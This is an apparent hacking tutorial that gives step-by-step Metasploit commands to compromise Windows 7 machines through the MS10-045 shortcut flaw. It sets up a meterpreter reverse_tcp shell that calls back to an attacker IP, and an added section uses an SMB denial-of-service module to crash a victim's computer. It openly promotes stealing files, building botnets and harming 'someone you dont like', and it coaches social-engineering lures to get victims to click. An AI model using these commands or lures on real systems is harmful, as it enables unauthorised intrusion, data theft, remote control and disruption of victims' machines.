Extreme Hacking
Advanced Ethical Hacking Institute in Pune

 

In this tutorial, I will show you how to use a simple shortcut file to crack a windows 7 computer.

Cracking into a computer can be useful for a number of reasons: it can give you access to the rest of the network, you can use it as a proxy to hide your IP, you can steal valuable files/details, you can use it as part of a botnet to DOS, etc, and more.

The operating system itself has become quite secure, but numerous vulnerabilities can still be found in other programs installed like the browser, adobe reader, and office. Some other methods are covered in my other tutorials. The vulnerability we will exploit is one found in the way windows 7 handles shortcut files. Lets begin.

1) Open Metasploit
You should be able to do this by yourself by now.

2) Select the Exploit
Microsoft has identified this vulnerability as MS10-045, it takes advantage of a buffer overflow in the shortcut dll. Use this command in Metasploit to load the exploit:

Code:
msf > use windows/ms10_045_shortcut_icon_dllloader

3) Configure the Exploit Options
The first option to set is the payload, and as before, we will use the meterpreter. this is an amazingly powerful payload which we can use to completely own their box.

Code:
set PAYLOAD windows/meterpreter/reverse_tcp

Then we need to set the LHOST, which is the IP of our (the attackers) computer:

Code:
set LHOST 192.168.1.111

4) Run the exploit
As usual, just use the command:

Code:
exploit

And this will generate a link and a server to host that link.
Now we need the victim to click the malicious link!

5) Send the Link to the Victim
This will require a bit of social engineering to convince the user to click the link. Be creative, tell them it is the latest movie download site or the password to a locked RAR file. When the victim clicks the link, their security settings will probably prompt them to allow or deny the webpage access to windows explorer, and they must click allow.
When the victim clicks on the “Allow” prompt, Metasploit begins the process of establishing a client/server connection between you and the victim. This process is fairly slow, so be patient. It may not even work, but be patient and hope it does Smile

We will now have control of their computer through the meterpreter installed on their machine. Now you can go ahead and do almost anything you like! In previous tutorials i covered how to download files and view the webcam/microphone, but the fun doesn’t have to stop there!

EXTRA: Crashing their computer

This exploit takes advantage of a vulnerability in Windows 7 and Windows Server 2008. We can create an infinite loop and crash the system – not as useful/fun as owning the system – but it can be very destructive/annoying for someone you dont like Smile

1) Run metasploit, load the appropriate exploit using this command:

Code:
msf> use auxiliary/dos/windows/smb/ms10_negotiate_response_loop

2) Set the required options.

Code:
msf> auxiliary(ms10_negotiate_response_loop) show options

As you can see, the only required option is the SVRHOST which is our attacking computer’s IP address. Set this option like this:

Code:
msf > auxiliary(ms10_negotiate_response_loop) set SVRHOST 192.168.1.8

3) Run the exploit!
Step 2 generates a shared folder at “\\192.168.1.8\Shared\Anything”, we then use this command:

Code:
msf > auxiliary(ms10_negotiate_response_loop) run

When the victim clicks on the link we send them, their computer will freeze and crash.
Use social engineering methods as above to get the victim to click the link. Good Luck!